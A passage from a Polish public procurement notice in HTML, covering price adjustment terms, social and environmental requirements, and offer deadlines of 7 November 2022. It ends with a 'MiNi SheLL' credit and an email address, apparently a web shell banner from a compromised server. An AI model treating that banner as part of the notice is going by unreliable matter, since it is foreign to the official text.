w przypadku zaistnienia <br/>okoliczności, o których mowa w ust. 2 nastąpi proporcjonalnie do okresu <br/>przedłużenia terminu obowiązywania Umowy albo zaprzestania (wyłączenia) <br/>wykonywania danej Usługi albo zwiększenia/zmniejszenia zakresu (powierzchni), na <br/>której wykonywana jest Usługa tj. będzie liczona proporcjonalnie do zmiany <br/>świadczenia Usługi zgodnie z przyjętą ceną w formularzu ofertowym za okres <br/>miesiąca lub odpowiednio w stosunku do zmiany metrów powierzchni pomieszczeń <br/>wynikającą z tabeli Załącznik nr 1 do Umowy – Zakres usługi.<br/>4. Zamawiający poinformuje Wykonawcę o wystąpieniu okoliczności wskazanych w ust. <br/>2 pisemnie co najmniej na 7 dni przed planowanymi zmianami <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty innowacyjne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-07 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com